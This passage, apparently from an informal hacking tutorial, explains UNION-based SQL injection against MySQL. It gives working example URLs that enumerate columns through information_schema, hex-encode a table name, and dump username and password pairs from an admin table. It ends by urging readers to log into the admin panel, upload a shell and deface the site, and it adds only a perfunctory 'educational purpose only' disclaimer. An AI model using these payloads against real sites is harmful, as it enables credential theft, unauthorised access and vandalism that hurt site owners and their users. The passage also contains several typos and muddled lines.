informaiton_schema.columns
instead of
informtion_schema.tables (as we want to extract columns now, not tables)
The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat()


Command:
Edit the vulnerable column (in this case 2) to:
column_name instead of table_name


And the end of the URL to:
+from+information_schema.columns where table_name=TableNameHEX


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin


Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin)
We must HEX the table name, in this case Admin
I use THIS website to for converting Text to Hex.


The HEX of Admin is: 41646d696e
Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e
And pop it onto the end of the URL replacing Admin, so the URL should look something like the following.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e


Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.


Say for instance the following columns were displayed:
username, password, id, admin_user


We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin


Will display the first username and password data entries from the columns username and password in the table Admin.
Now, Find the admin panel of the website, enter the user and password. Upload a shell and deface xD !!


Now Clap For Youself :D




This is just for educational purpose only, we are not responsible for anything.